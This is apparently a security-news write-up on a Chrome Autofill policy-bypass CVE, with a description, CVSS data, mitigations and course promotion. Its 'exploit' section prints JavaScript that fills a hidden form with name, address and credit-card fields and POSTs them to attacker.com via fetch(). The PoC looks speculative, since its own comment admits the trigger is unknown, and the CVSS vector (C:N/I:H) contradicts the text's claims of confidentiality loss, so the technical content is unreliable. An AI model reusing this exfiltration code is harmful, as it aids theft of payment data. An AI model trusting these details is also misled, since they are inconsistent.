Listen to this Post
CVE-2026-11135 is a medium-severity vulnerability in Google Chrome’s Autofill feature, present in all versions prior to 149.0.7827.53. The core issue is an “Insufficient policy enforcement” flaw that allows a remote attacker to bypass the browser’s discretionary access control (DAC) using a specially crafted HTML page.
Google Chrome’s Autofill system automatically fills saved form data (names, addresses, payment info) into web forms. To prevent malicious websites from stealing this sensitive information without user consent, Chrome implements a policy enforcement mechanism. This mechanism restricts which origins can request autofill data and under what conditions. Typically, autofill is gated by explicit user interaction with a form field to ensure the user is intentionally engaging with the website. However, due to a flaw in the policy enforcement logic, an attacker can manipulate the conditions under which Autofill is triggered.
The vulnerability is rooted in the way Chrome processes and validates the security context for autofill requests. When a user navigates to a malicious webpage, the attacker can embed a hidden form or a cross-origin iframe that appears to be part of the legitimate page. Because of the insufficient policy enforcement, Chrome fails to properly verify the origin of the autofill request or the legitimacy of the user’s interaction. As a result, the browser may inadvertently populate the hidden form with the user’s saved autofill data.
The crafted HTML page exploits this logic gap, tricking the browser into believing the autofill request originates from a trusted context, or that the user has interacted with the form. This bypasses the discretionary access control, which is designed to give users control over who can access their data. With the bypass, the attacker can silently exfiltrate the autofilled data without any visual indication to the user, leading to unauthorized data leakage.
The vulnerability is triggered remotely and requires the target to visit the attacker’s malicious page, but it does not require any additional privileges. The impact is limited to a partial violation of confidentiality and integrity, as reflected in the CVSS score. The flaw was internally discovered by Google and patched in the stable channel update released on June 4, 2026.
DailyCVE Form:
Platform: Google Chrome
Version: < 149.0.7827.53
Vulnerability: Insufficient Policy Enforcement
Severity: Medium (CVSS 6.5)
date: 2026-06-04
Prediction: June 11, 2026
What Undercode Say:
Analytics from CISA ADP and NVD indicate the following:
CVSS Vector String CVSS="3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" Base Score Score=6.5 (MEDIUM) EPSS Score (as of 2026-06-08) EPSS=0.02% (0.05622 percentile) SSVC Assessment Exploitation="none" Automatable="no" Technical_Impact="partial"
Exploit:
A proof-of-concept exploit would involve a malicious webpage containing a hidden iframe or form. The attacker primes the page to trigger the autofill policy bypass. For example:
<!-- Malicious page (attacker.com) -->
<iframe src="about:blank" id="hiddenFrame" style="display:none"></iframe>
<script>
// Dynamically inject a form that appears to be from a trusted origin
let frame = document.getElementById('hiddenFrame');
let doc = frame.contentWindow.document;
doc.write(`
<form id="stealForm">
<input type="text" name="full_name">
<input type="text" name="address">
<input type="text" name="credit_card">
</form>
`);
// Trigger autofill without user interaction by abusing the policy flaw
// (The exact trigger relies on the insufficient policy enforcement)
doc.getElementById('stealForm').dispatchEvent(new Event('focus'));
// Steal the populated data
setTimeout(() => {
let stolen = {
name: doc.querySelector('[name="full_name"]').value,
address: doc.querySelector('[name="address"]').value,
card: doc.querySelector('[name="credit_card"]').value
};
fetch('https://attacker.com/steal', {
method: 'POST',
body: JSON.stringify(stolen)
});
}, 500);
</script>
Protection:
- Update Google Chrome to version 149.0.7827.53 or later.
- Disable Autofill in Chrome settings (
chrome://settings/autofill) to prevent data from being populated automatically. - Use enterprise policies to enforce autofill restrictions: set `AutoFillEnabled` to `false` in group policies.
- For users, avoid saving sensitive information (credit cards, full addresses) in the browser.
Impact:
- Data Theft: An attacker can harvest saved autofill data including names, addresses, phone numbers, and credit card details without user awareness.
- Privacy Violation: The bypassed discretionary access control undermines user consent, leading to unauthorized data leakage.
- Integrity Impact: While the CVSS scores integrity as high (
I:H), the actual integrity impact is limited to the injection of malicious data or manipulation of form fields in the context of the attack. - Widespread Exposure: All Chrome users on any platform (Windows, macOS, Linux) running versions prior to 149.0.7827.53 are at risk. The vulnerability requires only that the user visits a malicious website, making phishing campaigns a likely vector.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
